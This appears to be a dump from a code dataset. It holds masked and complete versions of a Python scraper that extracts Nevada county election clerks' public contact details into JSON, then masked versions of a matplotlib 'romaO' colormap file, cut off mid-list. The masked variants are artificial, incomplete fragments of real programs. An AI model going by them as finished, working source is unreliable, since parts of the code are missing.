'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el
)
matches2 = re.search(
'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})'
, el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search('(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {**init, 'locale': locale, 'official': official, 'address': ', '
.join(address), 'emails': list(set(emails)), 'phones': [phone],
'faxes': [fax], 'url': url}
def main():
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
<mask token>
| <mask token>
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator:
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
def parse_emails_url(iter_):
emails = []
url = None
try:
while True:
iter_.peek_till('a')
email = iter_.__next__()
href = email['href']
if href.startswith('mailto:'):
if href[7:]:
emails += [href[7:]]
else:
emails += [email.text]
else:
url = href
except IndexError:
pass
return emails, url
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {'locale': locale, 'county': locale, 'emails': emails}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search('Nevada \\d{5}', el) or re.search('NV \\d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ')
matches1 = re.search(
'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el
)
matches2 = re.search(
'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})'
, el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search('(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {**init, 'locale': locale, 'official': official, 'address': ', '
.join(address), 'emails': list(set(emails)), 'phones': [phone],
'faxes': [fax], 'url': url}
def main():
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
<mask token>
| import json
import re
from bs4 import BeautifulSoup
from bs4.element import NavigableString, Tag
from common import dir_path
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator:
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > self.i
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
def parse_emails_url(iter_):
emails = []
url = None
try:
while True:
iter_.peek_till('a')
email = iter_.__next__()
href = email['href']
if href.startswith('mailto:'):
if href[7:]:
emails += [href[7:]]
else:
emails += [email.text]
else:
url = href
except IndexError:
pass
return emails, url
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {'locale': locale, 'county': locale, 'emails': emails}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search('Nevada \\d{5}', el) or re.search('NV \\d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ')
matches1 = re.search(
'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el
)
matches2 = re.search(
'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})'
, el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search('(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {**init, 'locale': locale, 'official': official, 'address': ', '
.join(address), 'emails': list(set(emails)), 'phones': [phone],
'faxes': [fax], 'url': url}
def main():
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
if __name__ == '__main__':
main()
| import json
import re
from bs4 import BeautifulSoup
from bs4.element import NavigableString, Tag
from common import dir_path
def is_element(el, tag):
return isinstance(el, Tag) and el.name == tag
class ElemIterator():
def __init__(self, els):
self.els = els
self.i = 0
def peek(self):
try:
return self.els[self.i]
except IndexError:
return None
def __next__(self):
self.i += 1
return self.els[self.i - 1]
def hasNext(self):
return len(self.els) > (self.i)
def peek_till(self, tag):
while not is_element(self.peek(), tag):
self.__next__()
def next_till(self, tag):
self.peek_till(tag)
self.__next__()
def parse_lines(iter_):
iter_.peek_till('strong')
county = []
while iter_.hasNext():
county += [iter_.__next__()]
if is_element(iter_.peek(), 'strong'):
yield ElemIterator(county)
county = []
yield ElemIterator(county)
county = []
def parse_emails_url(iter_):
emails = []
url = None
try:
while True:
iter_.peek_till('a')
email = iter_.__next__()
href = email['href']
if href.startswith('mailto:'):
if href[7:]:
emails += [href[7:]]
else:
emails += [email.text]
else:
url = href
except IndexError:
pass
return emails, url
def parse_url(iter_):
iter_.peek_till('a')
link = iter_.__next__()
href = link['href']
assert not href.startswith('mailto:')
return [href]
def parse_county(iter_):
county_title = iter_.__next__().text.strip().title()
locale = re.match('(.*) (City|County)', county_title).group(0)
if county_title.startswith('Clark County Elections Mailing Address'):
emails, url = parse_emails_url(iter_)
return {
'locale': locale,
'county': locale,
'emails': emails,
}
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
if 'Clerk' in el or 'Registrar' in el:
official = el.strip().split(',')[0]
break
address = []
while True:
el = iter_.__next__()
if isinstance(el, NavigableString):
address += [el.strip()]
if re.search(r'Nevada \d{5}', el) or re.search(r'NV \d{5}', el):
break
el = iter_.__next__()
el = iter_.__next__()
if isinstance(el, NavigableString):
el = el.replace(u'\xa0', ' ') # replace non-breaking space
matches1 = re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX (\(\d{3}\) \d{3}-\d{4})', el)
matches2 = re.search(r'(\(\d{3}\) \d{3}-VOTE \(\d{4}\)) FAX (\(\d{3}\) \d{3}-\d{4})', el)
if matches1:
phone = matches1.group(1)
fax = matches1.group(2)
elif matches2:
phone = matches2.group(1)
fax = matches2.group(2)
else:
print(county_title)
print(el)
print(re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX', el))
assert False
emails, url = parse_emails_url(iter_)
init = {'city': locale} if locale.endswith('City') else {'county': locale}
return {
**init,
'locale': locale,
'official': official,
'address': ', '.join(address),
'emails': list(set(emails)),
'phones': [phone],
'faxes': [fax],
'url': url,
}
def main():
# Actually this file: https://www.nvsos.gov/sos/elections/voters/county-clerk-contact-information
# But it's behind a javascript test
with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:
page = fh.read()
soup = BeautifulSoup(page, 'lxml')
ps = soup.select('div.content_area > p')
iter_ = ElemIterator([x for p in ps for x in p.children])
raw_counties = [parse_county(county) for county in parse_lines(iter_)]
merge_counties = {}
for county in raw_counties:
locale = county['locale']
if locale in merge_counties:
merge_counties[locale]['emails'] += county['emails']
else:
merge_counties[locale] = county
counties = list(merge_counties.values())
assert len(counties) == len(raw_counties) - 1
with open('public/nevada.json', 'w') as fh:
json.dump(counties, fh)
if __name__ == '__main__':
main()
| [
4,
12,
13,
15,
16
] |
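A small demonstration of the ElemIterator cursor on a parsed fragment — the county name and mailto address below are made up, and bs4 is assumed installed:

from bs4 import BeautifulSoup

soup = BeautifulSoup(
    '<p><strong>Washoe County</strong> text '
    '<a href="mailto:voter@washoe.example.gov">mail</a></p>', 'html.parser')
it = ElemIterator(list(soup.p.children))
it.peek_till('strong')       # advance until a <strong> is next
print(next(it).text)         # Washoe County
it.peek_till('a')            # skip the interleaved NavigableString
print(next(it)['href'])      # mailto:voter@washoe.example.gov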
45 | 5082182af5a08970568dc1ab7a53ee5337260687 | <mask token>
| <mask token>
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print('viscm not found, falling back on simple display')
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=
romaO_map)
plt.show()
| <mask token>
cm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [
0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251,
0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968,
0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [
0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178,
0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379
], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567,
0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833,
0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [
0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584,
0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345,
0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [
0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742,
0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628,
0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [
0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075,
0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665,
0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [
0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602,
0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415,
0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [
0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311,
0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808,
0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [
0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419,
0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771,
0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [
0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222,
0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233,
0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [
0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394,
0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413,
0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [
0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666,
0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354,
0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [
0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914,
0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694,
0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [
0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989,
0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803,
0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [
0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239,
0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252,
0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [
0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592,
0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666,
0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [
0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367,
0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835,
0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [
0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337,
0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724,
0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [
0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595,
0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395,
0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [
0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553,
0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934,
0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [
0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408,
0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425,
0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [
0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448,
0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947,
0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [
0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037,
0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612,
0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [
0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,
0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [
0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207,
0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337,
0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [
0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658,
0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572,
0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [
0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066,
0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552,
0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [
0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,
0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [
0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978,
0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695,
0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [
0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811,
0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456,
0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [
0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,
0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [
0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178,
0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577,
0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [
0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627,
0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728,
0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [
0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927,
0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411,
0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [
0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336,
0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842,
0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [
0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655,
0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132,
0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [
0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823,
0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282,
0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [
0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855,
0.2246, 0.34773]]
romaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)
test_cm = romaO_map
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
try:
from viscm import viscm
viscm(romaO_map)
except ImportError:
print('viscm not found, falling back on simple display')
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=
romaO_map)
plt.show()
| from matplotlib.colors import LinearSegmentedColormap
cm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [
0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251,
0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968,
0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [
0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178,
0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379
], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567,
0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833,
0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [
0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584,
0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345,
0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [
0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742,
0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628,
0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [
0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075,
0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665,
0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [
0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602,
0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415,
0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [
0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311,
0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808,
0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [
0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419,
0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771,
0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [
0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222,
0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233,
0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [
0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394,
0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413,
0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [
0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666,
0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354,
0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [
0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914,
0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694,
0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [
0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989,
0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803,
0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [
0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239,
0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252,
0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [
0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592,
0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666,
0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [
0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367,
0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835,
0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [
0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337,
0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724,
0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [
0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595,
0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395,
0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [
0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553,
0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934,
0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [
0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408,
0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425,
0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [
0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448,
0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947,
0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [
0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037,
0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612,
0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [
0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,
0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [
0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207,
0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337,
0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [
0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658,
0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572,
0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [
0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066,
0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552,
0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [
0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,
0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [
0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978,
0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695,
0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [
0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811,
0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456,
0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [
0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,
0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [
0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178,
0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577,
0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [
0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627,
0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728,
0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [
0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927,
0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411,
0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [
0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336,
0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842,
0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [
